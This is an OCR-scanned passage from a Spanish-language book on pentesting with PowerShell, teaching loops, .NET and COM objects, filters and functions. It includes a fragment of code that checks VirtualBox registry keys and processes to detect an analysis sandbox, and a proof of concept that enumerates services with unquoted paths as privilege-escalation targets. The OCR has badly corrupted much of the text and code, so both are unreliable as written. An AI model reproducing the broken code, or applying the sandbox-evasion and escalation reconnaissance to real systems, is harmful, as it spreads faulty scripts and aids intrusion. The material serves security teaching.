0  .Equals  ( "vboxt.  ray")  )  )  (  $vbox  =  Strue}  ) 

«y  -  Get-Chi  Id  I  tern  -Path  'HKLM:  \ HARDWARE \ACP I \DSDT' 
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if  (Skey . Name . EndsWirh ("VBOX  _")  ) 

$vbox  *  S  true 

Skey  -  Get-Chiloltem  -Path  *BKLM : \HA?CWARE\ACP J \FADT' 
it  (Skey  .Name .  EndsWith  ("V30X _ ")  > 

$vbox  «=  Strue 

$key  =  Get-Childltem  -Path  'HKLM:  \HAR0WARE\ftCM\RSDT' 
if  (Skey. Name .EndsWith { "V30X _ ") ) 

t 

Svbox  -  $true 

ikey  =  Get-ChildXtem  -Path  'HKLM: \HARDWARE\DEVICEMAP\Scsi\Scsi  Port  0\Scsi  Bus 
°VTatr1(5key°GetValu.e(wldeutifier")  .ToStringU  .StartsWith rv3CX" ) ) 

Svbox  ^  $true 

U  -  Gec-Cr.ildl tern  -Path  ’HKLK: \ftARDWARE\DBSCRimONV 

if  ($key.GetVaIu.e  ("SyscemBiosVerr.ior.")  .Star-sWith  VBOX 

Svbox  *  Strue 
return  Svbox 

Al  principio  de  la  funcion  se  da  por  hecho  que  la  maquina  sobre  la  quc  se  ejecuta  no  es  una  K/r/Hj' 
h aciendo  distintas  pruebas  para  comprobar  que  esto  no  cs  certo.  El  pnmertjpo* 
prueba  que' se  realize  es  listar  .os  diferentes  procesos  que  ejecutan  «ta 
cxisteneia  de  dos  procesos  clasicos  de  esia  plataforma,  como  son  VBoxPay  y  BoxSen  .ee. 

El  segundo  tipo  de  prueba  evalua  la  cxisteneia  de  unas  claves  de  registro  cn  HKLM:}H^°^ 
ACpfZ  cualcs  deben  linalizar  cn  VBOX Para  el  tercet  tipo  de  prueba  se  evalua  que  en  oU» 

rutas  del  registro  existan  unos  valores  que  comiencen  por  VBOX. 

Hay  que  letter  ett  cuen.a  quc  el  scrip!  h.  si*,  ilesam.llado  ...  P,,u crShd!  3.0  en  un  eq»(0 
H  L  l  salida  que  produce  esta  funcion  es  sencillamente  un  valor  booleam.  mdicando/a/aesi  n  s 
^teTuL  inn  Bp,. .  «w si  se  es.a  eiecu.ando  en  u„  —  de  ymuahaadi. 

como  el  mencionado. 


8.Bucles  J 

Los  bucles  son  sentencias  de  codigo  que  sc  cjecutaran  varias  voces  en  funcion  de 
condiciones.  Los  bucles  son  utilizados  para  no  escrtbir  repetidas  veces  t  -  ambitoM 
PowerShell  se  disponen  de  varios  bucles.  los  cualcs  se  pueden  uttl.zar  en  d.lerentes  an* 
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eontextos.  En  este  apartado  se  estudiaran  los  diversos  bucles  de  los  que  sc  euentan  cn  la  linea  de 
comandos  dc  PowerShell ,  y  se  podra  seguir  su  comprension  con  varios  ejemplos. 


For 

[  1  bucle  for  itera  un  cierto  numero  de  veces,  cuyo  valor  es  conocido  desde  el  principio  y  no  debe 
cambiar  durante  su  ejecucion.  Es  muy  util  i/ado  para  recorrer  listas  y  cstructuras  de  datos  como  los 

tirray- 

1 1  funcionamiento  que  tiene  un  bucle  for  es  el  siguiente: 

-  Se  evalua  el  inicio.  normalmente  es  la  initialization  de  una  variable. 

-  Sc  evalua  la  condicion,  cuando  esta  sea  falsa  se  termina  el  bucle. 

-  Si  la  condicion  es  verdadera,  se  ejecutan  las  instrucciones. 

-  La  expresion  se  incrementa  y  se  vuelve  a  evaluar  la  condicion. 

su  sintaxis  es  sencilla  y  es  la  mostrada  a  continuation. 
j»mt  (inicio;  condici&n;  incrementa) 

Bloqite  de  instrucciones 

I  m  Bum 

t : :  i y  -  im&ro' ,  '  segundo' ,  *  -erccro' 

:  :  { 3  ;  fi;  $i  f<iy- ~^ngLh;  Si++) 

Wr  5array/$i* 


Forcach 

1:1  fnreuchp  como  puede  verse  en  el  lenguaje  de  programaeibn  Ctt,  permite  irrecorriendo  un  conjimto 
i»  Itstado  dc  elementos  u  objetos.  Es  mas  un  cmdlet  que  una  instruction.  ya  que  dispone  del  cmdlet 
farvuch-ohject. 

l  a  sintaxis  para  utilizar  estc  tipo  de  bucle  es  la  siguiente: 

Bara  coda  etcmenio  en  co leccidi  )_el e memos 
Blntfue  dc  instrucciones 
f’  in  Para  aula 

1  n  cl  siguiente  ejemplo  se  puede  visualizar  como  tras  la  ejecucion  dc  un  listado  dc  un  direclorio 
con  el  bucle  se  puede  ir  recorriendo  los  distintos  elementos  de  la  coleccion. 

f$elemento  in  Get-Chi ldlttw) 

$  (Sele.mento .Haine)  atrtbutoa:  $  t^elemento  .Attributes)  * 
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Do-While 

Esle  bucle  es  especial  ya  que  es  postprobado,  es  decir,  su  condicion  de  sal ida  se  comprueba  una  vez 
sc  ha  ejecutado  el  bloque  de  instrucciones  previo.  En  otras  palabras  este  tipo  dc  bucle  se  ejecuta  1  o 
N  veces.  La  sintaxis  del  bucle  en  fbrmato  de  pseudocodigo  es  la  siguiente: 

Hacer 

Bloque  de  instrucciones 
Mientras  que  (condicion) 


El  funcionamiento  es  similar  al  del  bucle  while  salvo  que  la  evaluation  dc  la  condicion  sc  realiza  tras 
la  ejecucion  de  las  instrucciones,  por  lo  que  al  menos  estas  ser&n  ejecutadas  una  vez.  En  el  siguiente 
ejemplo  se  propone  un  menu,  como  el  que  se  pudo  estudiar  en  el  caso  del  selector  switch ,  para  un 
script. 

do 

t 

Write-Host  "1)  Opcidn  1" 

Write-Host  "?)  0pci6n  2" 

Write-Host  "3)  Salir" 

Write-Host  "Introduce  opcior.:" 

$opcion  =•  Read-Host 
Clear-Host 

} while ($opeion  -ne  3) 

While 

El  bucle  while  se  ejecutara  0,  1  o  N  veces.  Es  un  bucle  preprobado  mediante  una  condicion  inicial  j 
o  varias,  cuando  estas  dejan  de  cumplirse  se  sale  del  bucle.  Este  tipo  de  bucle  es  el  m&s  utilizadoen 
los  lenguajes  de  proaramacion.  Se  suele  utilizar  cuando  la  condicion  es  prepiobada  y  no  se  conoceei 
nu mere  de  iteraciones  que  se  van  a  cjecutar.  La  sintaxis  del  bucle  while  es  la  que  se  puede  visualizar 
en  el  siguiente  pseudocodigo. 

Mientras  que  (condicion) 

Bloque  de  instrucciones 
Fin  Mientras  que 


^C6mo  funciona  el  bucle?  El  funcionamiento  del  bucle  es  sencillo  y  se  divide  en  los  siguientes 
pasos: 

-  Se  evalua  la  condicion. 

-  Si  la  condicion  es  falsa  se  sale  del  bucle  sin  ejecutar  instrucciones. 

-  Si  la  condicion  es  cierta  se  ejecuta  el  bloque  de  instrucciones. 

Se  vuelve  a  iterar  evaluando  la  condicion. 


En  el  siguiente  ejemplo  se  implementa  un  contador  mediante  un  bucle  while. 
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Scant  =  0 

whil e($cont  -It  10) 

Write-Hcst  "iLeracion  numero  $ (Scont) * 

Scant 

PoC:  Encontrando  servicios  vulnerables 

Fn  csta  prueba  de  concepto  se  presenta  la  posibilidad  de  detcctar  rutas  de  binarios  de  servicios  de 
Windows  la  cuales  no  se  encuentran  especificadas  entre  comillas.  Esto  presenta  un  problems  y  es  que 
si  una  ruta  no  estd  entre  comillas  Windows  ejecutara  la  primera  ruta  que  se  encuentra  valida  hasta  el 
prjmer  espacio,  es  decir.  si  se  tiene  la  siguiente  ruta  C:\Program  Files\pablo  software' hinario.exe  se 
ejecutaria  C:  Prugram.exe  en  el  caso  de  existir. 

Dicho  de  otra  tnanera.  detectando  esto  un  atacante  puede  aprovecharse  de  este  handicap  para 
provocar  una  escalada  de  privilegios  tras  la  ejecucion  de  un  binario  creado  para  la  ocasion. 

Mas  addante  en  el  libro  sc  puede  encontrar  alguna  prueba  de  concepto  mas.  ya  que  esta  tecnica  esta 
implemcntada  en  frameworks  de  pentesting  con  PowerShell.  En  este  apartado  se  presenta  un  script 
qUC  sc  apoya  en  la  obtencion  de  un  listado  de  servicios  que  se  ejecutan  en  la  maquina  y  con  un  bucle 
forvach  se  van  recorriendo. 

Por  cada  elemento  que  se  recorrc.  los  cuales  son  objetos  con  distintos  atributos  y  propiedades  que 
representan  servicios  en  el  sistema,  se  hacen  una  serie  de  comprobaciones.  Lo  importante  en  el  caso 
tic  los  servicios  es  la  ruta  donde  se  encuentra  cl  binario  y  para  ello  se  utiliza  el  pathname  por  cada 
elemento  recorrido.  Se  comprueba  que  el  pathname  no  sea  nulo,  no  sea  vacio  y  que  no  comienza 
por  comil  la. 

IJna  vez  que  se  comprueben  estas  cosas  se  comprueba  que  la  ruta  no  sea  Windows .  y  por  ultimo  se 
muestra  la  information  de  los  servicios  cuyo  binario  no  se  encuentra  en  una  ruta  que  comienza  por 
comillas  y  que  tienen  la  posibilidad  de  contener  espacios  en  su  ruta.  por  !o  que  sedan  polencialmente 
vulnerables. 

•  -  **rvices  "  gwmi  vjin 32  service 
i' t^ach  (Selemento  in  ^Services) 

It  U  ISeleraen to .pathname. Equals  ("")  )  -and  ( ISelemento. pathname. 

*  irt:,Wir.h("  "*)  )  -and ($eiemer.tc .oathname  -ne  $njll)) 

Se  1  om  -  SeiGtiecr.o .  Pathname .Split  ("  "HO. 

* ( ( l  Selem. Contains  (":  \W_ndows")  ) ) 

Seien;entO.  Pa  th Noire 
Selementc  .Name 
I 

) 


» 


9.Creacion  de  objetos  .NET 

La  tinea  de  comandos  de  PowerShell  permite  uliliz-ar  componentes  eon  interlaces  .NET  Framework 
y  COM.  De  esle  modo  el  usuario  dcbe  entender  que  no  se  limita  al  uso  de  amllers. 

New-Object 

El  cmdlet  New-Object  permite  crear  objetos  desde  PawerShell.  Este  cmdlet  permite  crear  mstanciaj 
de  una  clase  de  .NET.  En  el  siguienle  ejemplo  se  utiliza  la  clase  System. Diagnostics. k vent  Lop.  en 
PawerShell  v2.  la  ejecucion  seria  la  siguiente  New-Object  -Type  System. Diagnostics.  EventLog  A 
AigumentL  ist  Appl  iccit  i  on. 


La  ejecucion  anterior  se  denomina  constructor,  ya  que  tos  arguments  que  se  pasan  como  valot 
son  utiiizados  en  un  metodo  especial. 


3ers\pablo>  Ne»-Obj«,ct  -TypeNane  Systen.Diagnostics .EyentLog  -ArgunentList  fipplict.. 

Max(K)  Retain  Overf louAction 

Entries  Log 

20.480  0  OverwriteAsNeeded 

20.979  Application 

PS  C:\Users\pablo > 

Fig.  2.11:  Creadon  tic  ohjeto. 


El  objeto  creado  anteriormente  puede  ser  almacenado  en  una  variable,  hacicndo  reterenua  a  tste.ll 
este  modo  el  objeto  puede  ser  utilizado  durante  la  sesion  o  el  script  por  el  usuario. 

PowerShell  puede  realizar  gran  cantidad  de  canalizaciones.  aunque  en  algunas  ocasl“n"J 
interesante  utilizar  variables  para  almacenar  objetos  con  el  fin  de  poder  mantpularlos  JP°  "I 
con  mayor  facilidad. 


Capita/0  IT  Scripting  en  PowerShell 


65 


Creacion  de  objetos  COM 

Se  puede  utilizar  el  cmdlet  New-Object  para  trabajar  con  los  componentes  COM.  Estos  componentes 
proporcionar  desde  diversas  bibliotecas  que  son  incluidas  en  Windows  Script  Host,  WS11 .  hasta 
aplicaciones  ActiveX,  como  por  ejemplo  el  famoso  navegador  de  Microsoft  Internet  Explorer. 

La  mayoria  de  los  objetos  conocidos  como  WSH  pueden  crearsc  cspecificando  lo  que  se  denomina 
ProglD.  Estos  ProgJD  pueden  ser  WScript.Shell,  WScript. Network,  Scripting.Dictionaryy  Scripting. 
pileSystemObject .  A  continuation  se  enumeran  los  comandos  que  permiten  a  un  usuario  crear  este 
tipo  de  objetos: 

-  New-Object  -ComObject  WScript.Shell. 

-  New-Object  -ComObject  WScript.Network. 

-  New-Object -ComObject  Scripting. Dictionary. 

-  New-Object  -ComObject  Scripting.FileSystemObject. 


Para  ejemplificar  que  cosas  se  pueden  llevar  a  cabo  con  este  tipo  de  objetos  se  van  a  crear  aecesos 
ili rectos  con  WScript.Shell.  En  este  ejemplo  se  quiere  crear  un  acceso  directo,  el  cual  vincule  a 
una  earpeta  personal  del  usuario.  En  primer  lugar  se  debe  crear  una  referenda  a  WScript.Shell  y 
almacenarla  en  una  variable,  por  ejemplo  Swshshell  =  New-Object  ComObject  WScript.Shell.  Para 
poder  evaluar  los  metodos  y  propiedadcs  disponiblcs  en  este  objeto  se  puede  utilizar  el  cmdlet  Get- 
\f ember,  por  lo  que  si  se  ejecuta  Swshshe/l  \  Get-Member  se  obtendran  diferentes  metodos  que 
pueden  ser  lanzados  por  el  usuario. 


*S  C:\Users\pahlo > 
K  C:\Users\pablo) 


rush 

rush 


Upcc ialFolders 
Systcn. _ ComObject 


Neu-Object  -ComObject  WScript.Shell 

Current Directory 


C:\Users\pablo 


C:\Users\pablo >  $wsh  !  Get-Member 


Type  Mane :  System. _ ComObjecttK41904400-bel8-lld3-a28b-00104bd35090> 


MemberType 


Def in  it ion 


inactivate  Method 

rratrSliortcut  Method 

...  Method 

i  MnitnvironmentStrings  Method 
Method 


Method 

Method 

Method 

Method 

Method 

Method 


bool  fippflct ivate  (Uariant,  Uariant> 

IDispatch  CreateSbortcut  (string) 

IWshExec  Exec  (string) 

string  ExpandEnvironnentStrings  (string) 
bool  LogEuent  (Uariant,  string,  string) 
int  Popup  (string,  Uariant,  Uariant,  Uariant) 
id  RegDe' 


void  RegDelete  (string) 

Uariant  RegRead  (string) 
void  RegWrite  (string,  Uariant,  Uariant) 
int  Run  (string,  Uariant,  Uariant) 
void  SendKeys  (string,  Uariant) 

Parameter izedProperty  IWshEnv ironnent  Environment  (Uariant)  <get> 
Property  string  CurrentDirectory  ()  (get>  (set> 

Property  IWshCollection  SpecialFolders  ()  (get> 


Fig.  2.  f2:  Creadon  de  nn  ohjeto  COM  en  Pow  er  s  hell. 


rndtodo  if  Script. Shell.  CreateShortcut  acepta  un  argument®,  el  cual  es  la  ruta  del  archivo  de 


directo 


que  se  quiere  crear.  Se  puede  utilizar  una  ruta  de  tipo  absoluta,  es  deem  una  ruta 
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completa  al  directors  en  el  que  se  quicre  crear  el  acceso  directo.  Para  crear  el  acceso  directo 
se  ejecuta  la  siguiente  instruccion  sobre  la  linea  de  comandos  de  PowerSheU  Sink  Swshshell. 
rrvnteShnrtcutf "<ruta  directorio>  "). 


Filtros  ... 

El  cmcllet  Where-Object  permite  evitar  que  un  objeto  pase  por  una  canalizacion  si  no  cumple  con 
la  condicion  requcrida.  En  eras  palabras.  1*1 we-Objea  probara  cada  objcio  da  la  canal™  y  l„ 
pasara  por  esla  solo  si  cumple  una  determinada  condicion.  Logicamente.  los  objetos  que  no  superen 
i«  prueba  se  quilan  dc  dicha  canaliaacion.  La  condicion  a  probar  por  el  cmflet  se  propomrona  como 
el  valor  del  parametro  Where-Object  -FilterScript. 

En  este  apartado  se  va  a  mostrar  un  ejemplo  seneillo  de  uso  de  FilterScript.  pero  ;,Que  es  el 
FilterScript ?  Realmente  es  un  bloque  de  script,  es  decir  uno  o  mas  comandos  de  PowerSheU  que 
son  espccificados  entre  Haves.  El  parametro  FilterScript  es  evaluado  a  true  o  false.  El  bloque  de 
script  puede  contener  codigo  muy  seneillo.  pero  se  debe  tener  claro  algunos  coneeptos  previos. 
Generalmente,  el  codigo  del  interior  de  un  bloque  de  script  seran  operaciones  de  tipo  comparacion. 


El  operador  realizara  una  comparacion  entre  los  elementos  que  aparecen  a  ambos  lados  del  operador. 
Los  operadores  de  este  tipo  pueden  visualizarse  en  la  siguiente  labia  de  elementos: 


Comparador 

Dcscripcion 

-eq 

Igual  a 

-ne 

Distinto  a 

-a 

Menor  que 

-le 

Menor  o  igual  que 

■S' 

Mayor  que 

-ge 

Mayor  o  igual  que 

-like 

Es  como 

-contains 

Contiene 

-i notlike 

No  es  como 

Tahiti  2.06 :  Elementos  tie  comparacion  para  FilterScript. 


Los  bloques  de  script  que  utiliza  el  cmcllet  Where-Object  utilizan  una  variable  especial,  la  cual  esi. 
Esta  variable  hace  referenda  al  objeto  actual  que  se  encuentra  en  la  canahzacion. 


En  el  siguiente  ejemplo  se  pasan  diversos  objetos  al  andlet  Where-Object.  los  cuales  son  '-va 
para  eomprobar  s,  la  longitud  de  dichos  objetos  es  mayor  dc  5.  La  mstrucc.on  ejeeutada^ 
siguiente  "pablo  ".  Sandra  ",  "natalia  "  \  Where-Object  {$_.  length  -g,  5/.  Esta  mstrucc.on 
el  nombre  pablo  por  no  cumplir  con  la  condicion  dc  que  su  longitud  sea  mayor  e  . . 


Como  se  ha  visto  en  el  ejemplo  anterior  la  variable  especial  $_  tiene  acceso  a  las  propiedades  de  los 
objetos,  y  esto  es  realmente  util,  ya  que  permite  al  usuario  aprovecharse  dc  todo  el  potencial  que 
aportan  los  objetos.  Imaginando  un  sistema  Windows  y  utilizando  la  clase  Win32  SystemDriver  de 
\Y\B  se  puede  filtrar  por  las  propiedades  de  esta  el  contenido  que  se  quiere  visualizar. 

Como  ejemplo  se  presenta  la  siguiente  instruccion  Get-WmiObject  -Class  Win32  SystemDriver 
Where-Object  FilterScript  {$_.State  eq  "Running”/.  Previamente  para  poder  visualizar  los 
nietodos  y  propiedades  de  los  objetos  se  podia  ejecutar  Get-WmiOhject  -Class  Win32  SystemDriver 
Get-Member. 


La  lista  que  puede  ser  visualizada  con  las  ordenes  anteriores  puede  aim  seguir  siendo  muy  larga. 
Puede  ser  util  concatenar  condiciones.  por  ejemplo,  de  la  siguiente  manera  Get-WmiObject  Class 
Win32  SystemDriver  \  Where-Object  -FilterScript  {$_.State  -eq  "Running”/  |  Where-Object  - 
FilterScript  /$_.  Start  Mode  eq  ” Auto  ”}. 

Ahora  se  pueden  utilizar  cmdlets  que  den  formato  a  la  salida  y  concatenarlos  al  final  de  la  instruccion 
ejecutada  antcriormente.  Como  se  puede  visualizar  es  realmente  utilizar  filtros  que  ayuden  a 
encontrar  la  infbrmacion  que  el  usuario  necesita  en  cada  instante.  Se  puede  evitar  utilizar  dos  veces 
los  cmdlets  Where-Object  si  se  utiliza  un  operador  logico-tfw/en  este  caso. 


LI  ejemplo  anterior  quedaria  de  la  siguiente  manera  Get-WmiObject  Class  Win32_Sys/emDriver 
Where-Object -FilterScript  {(S.State  -eq  "Running”)  -and  (S  .Start Mode  -eq  "Auto  ')/. 


r.  C:\li!;ersM>ftblo>  Cot-UniObjoc t  -Class  Uin32_SystcnDr iver  I  Where-Object  -FilterScript  <<$  .State  -eu  "Running")  -and  < 
\  .St Art Hotle  -eq  "fluto"» 

Im  jll.tvN.mr  :  Link-Layer  Topology  Discovery  Mapper  I/O  Driver 
**fv  :  lltdio 

St «tr  :  Running 

It Atuc  :  OK 

Itarted  :  True 

lit-.MlxvH.ine  :  Uirtualizacion  do  archivos  UAC 

*•**»•  :  luafv 

It xte  :  Running 

tfAiir.  :  OK 

Kt«rt*<l  t  Truo 

6 1  I'l.iyM.me  :  NetGroup  Packet  Filter  Driver 
!**»•  :  npf 

Bt«t«  :  Running 

:  OK 

Klartnil  :  True 

»»'MlxvH.*ne  :  PEAUTH 

:  PEAUTH 

!*",r  :  Running 

{  :  OK 

:  True 


Fig.  2. 13:  Utilizacion  de  filtros  de  objetos  con  Powershelf. 


•0.  Utilizacion  de  clases  y  metodos  de  .NET 

t0(*as  *as  clases  de .  NET  Framework  se  pueden  crear  con  el  andlet  New-Object.  En  algunos  casos 
f  ’ntcnlar  ^evar  a  cabo  esta  operativa  se  obtendra  un  mensaje  de  error  desde  la  linea  de  comandos 
cnorcs'>  °  ^  n°  Se  *la  encontra<^°  constructor  adecuado  para  ese  tipo.  <;Por  qu£  se  producen  estos 
orcs  Se  producen  debido  a  que  no  hay  una  manera  de  crear  un  objeto  a  partir  de  dichas  clases 
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que  quieren  ser  utilizadas.  Estas  clases  son  bibliotecas  de  referenda  de  metodos  y  propiedades  que 
no  cambiaran  de  estado.  En  otras  palabras,  solo  se  tendran  que  uUl.zar  sin  mas. 

A  continuacion  se  muestra  un  ejemplo  de  como  utilizar  las  clases  y  los  metodos  de  estas  Para  haeer 
referenda  a  una  clase  estatica.  por  ejemplo  System.  Environment,  sc  debe  espec, heard  nombre  de 
a  c  ase  entre  corehetes.  En  otras  palabras  se  puede  eseribir  en  PowcrShell  [System.Envnvnmem] 
y  se  obtendrf  iirfonrorcidn  gee, .,1  robro  el  tipo  que  se  esa  nondo  Co™.  no.u  ex„a  mdicarqu, 
tambicn  se  puede  omitir  la  palabra  System  invoeando  [Environment]  directamente. 

•  Que  hace  Svstem.Envimnmenfl  Esta  clase  estatica  contiene  informacion  sobre  el  entomo  de  trabajo 
delproceso actual. el  cual  es  PoverShell.exe cuando se trabaja en  la  linea de comandos de  Microsoft. 

Para  poder  visualizar  los  metodos  estaticos  de  la  clase  se  puede  utilizar  el  cmdlet  Ge, -Member  com 
se  hacia  con  los  objetos  anteriormente.  Por  ejemplo,  si  se  qmere  obtener  los  metodos  estaticos  sc 
ejecuta  [System. Environment]  \  Get-Member  -Static. 


C:NUsei*s\pablo>  [Systen. Enuironnont J  I  Get-Member  -Static 


TypeNane:  Systen . Env ironnent 

Monberl  ype 


Method 

Method 

Method 

Method 

Method 

Method 

Metltod 

Method 

Method 

Method 

Method 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 

Property 


xpandEnw ironpwntUariableo 

ailFact 

GetConmandLineArgc 

tEnvironwcntUariable 

tEnu ironnontUariableo 
tPolderPath 
tLogicalDrioeo 
_ferenceEqualc 
etEnv ironnentUariable 
nnandLine 
rentDirectory 
Ex  it Co do 

asShutdounStarted 

hineNane 
NewLinc 
Uersion 

ProcessorCount 

tackTrace 

rectory 
t 

__  Dona in Name 
crlntoractiue 
JserNanc 


:  bool  Eguals<Syste«.Objoct  objfi.  Systen. Object  ohjB> 

I  string  ExyoodEnoironnentUaplableetstrlna  nane> 

:  System. Uoid  FailFast<otring  nesaage> 

:  stringl  1  GetComnandLineArgcO  oariablo>,  static  string  GetEnviro 

\  ^L'e^o55"BsJl'qnne“S;?i«Me<°t^n,Sulr"ble^=trin.J,Bu»lue).  .... 

c  Systen. String  CommandLine  <9®* » J  .x 

c  Systen. String  CurrcntDirectory  <get,-et,> 
c  Systen. Int32  ExitCode  <9ct;oet,> 

c  System. Boolean  HasShutdounStarted  <get.> 

c  Systen. String  MachineNane  <get,> 
c  Systen. String  NewLine  <g®t*'  .  , 

c  Systen. OperatingSysten  OSUersion  <get,> 

c  System. Int32  ProcessorCount  <9®t»> 
c  Systen. String  StackTrace 


:  Systen. String  awe  a » _ ... 

:  Systen. String  SystenDirectoro  <get,> 

:  Systen. Int32  TickCount  <get.3 
:  Systen.String  UserDonainMane  <get.> 

■  Systen. Boolean  Uuerlnteract iwo  <get.> 
:  Systen.String  UscrNane  <get;> 

:  Systen. Uersion  Uersion  <get»> 

:  Systen. Inthd  IterkingSet  <get,> 


Ffc  2. 1 4:  Obtencidn  tie  met oiios  estaticos  en  clases  de  ,NE T  Framew  ork . 

Para  poder  lislar  las  propiedades  de  la  clase  esiaiica  sc  puede  utilizar  la  siguiente  instruccioir  /Sr»»l 
1]  I  J«Ur  -Membrrltoe  Pnpern:  De  nuevo  cs  tundamcmal  el  uso  del  r«l 

Gel-Member  para  poder  listar  las  propiedades  de  la  clase. 

Para  poder  Icerel  valor  de  las  propiedades  se  utiliza  para  mdicar  n  Power  Shell  que  sv  qui'-t'- 

una  propiedad  o  un  melodo  estatico.  Por  ejemplo.  si  se  quiere  acceder  d  i .suano  que  ha  la  «j 
el  proceso  de  PowerShetl  sc  puede  ejecutar  [System. Environment].. Useu  a^.  J  ** 
visualizarse  en  la  images.  Otros  ejemplos  interesantes  es  la  u  il.zac.on dt 
la  cual  indica  que  version  de  Windows  se  esta  ejeculando.  o  la  propiedad  HasShutdtn  1 

ual  i  dica  si  el  equipo  sc  esta  apagando.  Existen  multitud  de  metodos  y  propiedades  en  a  ^ 
extrapolando  esto  al  uso  de  otras  clases  estaticas  de  .NET*  puede  dilucidar  un  gran  potencall 

el  scripting  en  PowerShetl. 
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PS  C=\Users\pablo>  [System- Enu ironment ]: :ConnandLine 
rC :  M7I  ND0V/S\sys  tem32\Windows  PowerS  he  ll\ui  -0\powershell.exe0 
[PS  C:\Users\pablo>  [System. Environment J: : User In terac t ive 
[True 

PS  C:\Users\pablo>  [System. Environment  ]:: UserDomainNaroe 
pablo-vn 

PS  C:\Users\pablo>  [System. Env ironment ]: :UserNamc 

pablo 

PS  C:\Users\pahlo> _ 


Fig  2.  15:  Levin ra  de  propiedades  estaticas  de  clases  .NET  Framew  ork. 


Otra  clase  estatica  interesante  es  System. Math,  la  cual  pennite  realizar  algunas  operaciones 
matematicas  complejas.  Se  puede  utilizar  cl  cmdlet  Get-Member  de  nuevo  para  obtener  informacion 
acerca  de  que  cosas  se  pueden  realizar  con  la  clase.  Bs  realmente  interesante  profundizar  sobre  este 
uina.  ya  que  como  se  mencionaba  anteriormente,  abre  un  nuevo  mundo  de  posibilidades  para  el 
scripting  en  PowerShetl. 


ll.Funciones 

Una  funcion  es  una  secuencia  de  codigo  aislada  que  realiza  una  o  varias  acciones  para  devolver  un 
valor.  Pueden  recibir  pararnetros  dc  entrada  para  trabajar  con  estos  vaJores  v  son  muy  utiles  para 
rcutilizar  codigo.  de  este  modo  se  evita  no  tener  que  eseribir  codigo  repetido  en  distintas  partes  del 
desarrollo.  Las  funcion.es  pueden  ser  invocadas  desde  cualquier  punto  de  un  script. 


El  provider  de  las  funciones 

El  proveedor  de  las  funciones  es  un  almacen  dbnde  se  puede  navegar  y  realizar  operaciones  sobre 
las  distintas  funciones  en  el  entomo  de  PowerShetl.  Para  trabajar  sobre  este  proveedor  se  ejecuta 
la  orden  at  function:  y  sc  pueden  utilizar  los  cmdlet  que  permiten  navegar  entre  directorios  para 
realizar  acciones  sobre  el  almacen. 


inflows  PowerShe  11 

opyright  <C>  2009  Microsoft  Corporation.  Reseruados  todos  los  derechos. 


*1*  bit-PC\pablo  bienuenido  a  PowerShell 
;•  C:\Ucers\bit  02/28/2012  10:21:11  >  cd  function: 
Function 02/28/2012  10:21:16  >  dir 


mndT  ype 


Name 


Definition 


:t  ion 
ion 
:t  ion 
:t  ion 
:t  ion 


C: 

cd. . 
cd\ 


Set-Location  ft 
Set-Location  B 
Set-Location 
Set-Location 
Set-Location 


C: 


Fig.  2.16:  List  ado  del  proveedor  de  funciones 


^  rear  funciones 

*  Ja  ^nca  c^‘  comandos  de  PowerShetl  las  funciones  estan  definidas  por  diversos  elementos.  A 
*nuacion  se  enumeran  los  diferentes  elementos  que  definen  una  funcion: 


70 


Peniesting  con  PowerShell 


.  Palabra  reservada  function. 

-  Nombre  de  la  funcion. 

-  Ambito  de  la  funcidn.  aunque  este  elemento  es  opcional. 

.  Argument  quc  son  pasados  a  la  funcion.  Sc  pueden  pasar  desde  0  hasta  N  argumentos, 

aunque  tambien  son  un  elemento  opcional. 

.  Bloque  de  instrucciones.  Este  bloque  es  ejecutado  cada  vez  que  se  mvoca  la  tunc, on. 

-  Parametros  a  dcvolver.  La  funcion  puede  devolver  o  no  un  resultado. 

A  continual  sc  muestra  e.  pseudocode  que  se  utiliza  para  definir  las  funciones.  La  sintaxis  es 
sencilla. 

Funcion  [Ambito]  nombre  de  la  funcion  [flista  argumentos)] 

Bloque  de  instrucciones 
Fin  Funcion 

Un  ejemplo  bi*. -  1.  — 

- — . -  **  - 

o  la  shell. 

function  listarAtributos 

foreaefe  ($elemento  in  Get-Childltem) 

{  echo  ”$  ( Selemenco .  name )  atritoatoa:*  (Seletnen to,  attributes ) " 

) 

Para  observar  el  contenido  de  las  funciones.  es  decir.  su  codigo.  se  puede  utihzar  cl  undid  ga 
content  sobre  el  almacen  de  las  funciones. 


foi-each  <$elenento  in  Get-Child, ten> 

<  ecIlo  "$<$eler»onto  .nane)  atrib«toc:S«elenento.*ttrib«teSV 

} 

PS  Function^  02/28/2012  10:dQ:SO  >  ■ 


Fig.  2. 1 7:  Capture  de  codigo  de  una  funcion  implement  a. 

Cuando  el  usuario  necesile  pasar  valores  a  una  funcion  se  pueden  ^mediante  el  uso* 

La  primer,  de  las  formas  es  mediante  argumentos  mientras  qu 

acoinpaflado^d  nombre  de.  parametro.  por  lo  que  su  postcion  no  aporta  s.gmficado.  i 

La  primera  manera  que  se  estudia  es  el  paso  devabresafuncionesm 

Su  sintaxis.  como  puede  visualizarse,  es  intuitive  y  sencllo  Nombre  de  ji  M 

argumento2  ...  argumento  A. 
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Para  el  ejemplo  se  rnejora  la  funcion  anterior,  la  cual  ahora  recibira  un  argumento  que  seta  el 
directorio  sobre  el  que  hacer  el  listado  con  los  atributos. 

-'unctisn  listarAtributos 

foreach  ($e^smento  in  Get-Chi Idltem  $args[0]) 

echo  "$  ($el emeu to. name)  atributos  :  S  [Selemento. attr  ;butes)  " 

\ 

8e]ecucion 

:/ C:\Users\bi t>  listarAtributos  c:\ 

l  a  segunda  forma  es  el  uso  de  los  parametros.  Como  se  ha  comentado  anteriormente.  el  orden  es 
indiferente  en  el  paso  de  parametros,  por  lo  que  ofrece  una  ventaja  frente  al  uso  de  argumentos.  La 
sintaxis  es  la  indicada  a  continuacion  Nombre  de  la  funcion  -Parametro  1  <valor  pardmetro>  ... 
. Parametro  N  <  valor  parametro > . 

I  n  el  siguiente  ejemplo,  se  modifica  la  funcion  anterior  para  disponer  de  un  parametro  que  sea  el 
directorio  sobre  el  que  listar  y  un  parametro  que  indicara  si  obtener  los  atributos  o  no. 

j  unction  li  starAtributcs 

pa  ran.  (  I  St  t  ;  ng]  $directorio,  [string]  $mostrar)  ; 
foreach  ($e:emento  in  Get -Chi  Id  I  Lorn  ^directorio) 
t 

if (Smostrar-eq' si' ) 

\ 

echo  (Seiementc. name)  atributos : 5 (Selementc .attributes ) " 

) 

else 

I 

eciu  ($eiementa .  name)  ” 

\ 

\ 


•^lecucion 

p:’  \U.ners\bit>  iis tarAtributos  -direcLorio  c:\  -mostrar  si 
